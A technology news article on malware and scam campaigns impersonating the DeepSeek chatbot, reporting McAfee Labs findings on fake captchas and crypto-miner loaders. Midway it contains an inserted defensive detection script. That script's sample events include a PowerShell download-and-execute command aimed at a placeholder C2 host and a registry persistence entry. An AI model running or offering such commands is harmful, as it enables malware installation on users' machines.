DeepSeek mania inspires multiple scam campaigns

Fake installers, malware droppers, and info stealers were all deployed under the cover of the popular Chinese chatbot.

For a while in January and February this year, it seemed the Chinese AI chatbot DeepSeek was everywhere – it was a hot ticket item in the Apple and Android app stores and sparked interest in the business community due to its relative cheapness and open-source availability.

Soon after, it made headlines after being banned by multiple governments – including in Australia – over possible links to the People’s Republic of China (PRC) government, but the horse had well and truly bolted, and DeepSeek remained highly sought after, especially in internet searches.

That popularity, of course, has also made DeepSeek a major boon for scammers and cyber criminals.

Researchers at McAfee Labs – the threat research division of security company McAfee – observed multiple campaigns taking advantage of DeepSeek’s popularity to spread malware, install other apps entirely, and even deploy crypto-miners.

Multiple Android apps used the DeepSeek icon to trick victims into downloading completely unrelated apps, driving revenue and download counts, while other installers purporting to be DeepSeek installed completely different apps, such as Audacity and WinManager. This allowed affiliates who rely upon pay-per-install commissions to spike their revenue by taking advantage of the DeepSeek craze.

In another instance, McAfee Labs observed malicious actors using DeepSeek-themed fake captcha pages. Fake captchas are nothing new and are often used to spread the Lumma Stealer info stealer.

“In this instance, the website deepseekcaptcha[.]top pretends to offer a partnership program for content creators,” McAfee Labs said in a recent blog post.

“They are utilising the technique called ‘brand impersonation’, where they’re using DeepSeek’s icons and colour scheme to appear as the original website.”

After registering for the partner program, the victim is directed to what appears to be a legitimate captcha page that asks them to follow some unusual steps to verify they’re human, including pressing Windows+R to bring up a “verification window” and then pressing CTRL-V. When OK is clicked, it actually installs malware capable of stealing financial data from the compromised device.

In another case, several files posing as DeepSeek releases – DeepSeek-VL2.Developer.Edition.exe, DeepSeek-R1.Leaked.Version.exe, and DeepSeek-VL2.ISO.exe – were actually loaders for crypto-miners. After fetching a PowerShell script from malicious command and control (C2) infrastructure, the loader bypasses system policies, installs the script, and makes changes to the system registry to maintain persistence.

Once all that is done, the loader contacts the C2 server again, this time to download the parameters that will begin the Monero mining process, slowing down the device and quite possibly leaving it open to further compromise.
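The two behaviours described above (a shell launched from the Run dialog after a fake captcha, and a PowerShell autorun entry written for persistence) are the kind of telemetry a defender would alert on. The following is an added detection example, not code from the article or from McAfee Labs; the events are constructed, simplified Sysmon-style records and the C2 host is a placeholder.

```python
import re

# Constructed sample telemetry: simplified process-creation and registry-set events.
# Not real captures; "c2.invalid" stands in for the attacker's C2 host.
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -ExecutionPolicy Bypass -w hidden -c "iwr http://c2.invalid/s.ps1 | iex"'},
    {"type": "process", "parent": r"C:\Program Files\Backup\agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\Program Files\Backup\nightly.ps1"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": r"powershell -w hidden -ep bypass -File C:\Users\Public\u.ps1"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "value": r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
]

SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")
POLICY_BYPASS = re.compile(r"-(?:executionpolicy|ex|ep)\s*bypass", re.I)
DOWNLOAD_CRADLE = re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|iex|invoke-expression|curl)\b", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.I)

def detect(event):
    """Return the rule names an event matches (empty list = nothing suspicious)."""
    hits = []
    if event["type"] == "process":
        parent = event["parent"].lower().rsplit("\\", 1)[-1]
        image = event["image"].lower().rsplit("\\", 1)[-1]
        cmd = event["cmdline"]
        # Commands pasted into Win+R run as children of explorer.exe; a shell spawned
        # there with a policy bypass or a download cradle matches the fake-captcha flow.
        if parent == "explorer.exe" and image in SHELLS and (
                POLICY_BYPASS.search(cmd) or DOWNLOAD_CRADLE.search(cmd)):
            hits.append("clickfix_run_dialog_shell")
    elif event["type"] == "registry":
        # An autorun value that launches PowerShell is the loader's persistence step.
        if RUN_KEY.search(event["key"]) and re.search(r"powershell|pwsh", event["value"], re.I):
            hits.append("run_key_powershell_persistence")
    return hits

def triage(events):
    """Map each suspicious event's index to its matching rules; clean events are omitted."""
    return {i: detect(e) for i, e in enumerate(events) if detect(e)}

if __name__ == "__main__":
    for idx, rules in triage(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
```

Real deployments would key the same rules off Sysmon Event ID 1 (process create) and Event ID 13 (registry value set), and should also flag the parent being cmd.exe or conhost.exe where the Run dialog hands off differently.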

“The attacker purposely mines Monero cryptocurrency, as it prioritises anonymity, making it impossible to track the movements of funds,” McAfee Labs said.

“This makes it a popular coin by a number of crypto-miners.”

David Hollingworth

David Hollingworth has been writing about technology for over 20 years, and has worked for a range of print and online titles in his career. He is enjoying getting to grips with cyber security, especially when it lets him talk about Lego.
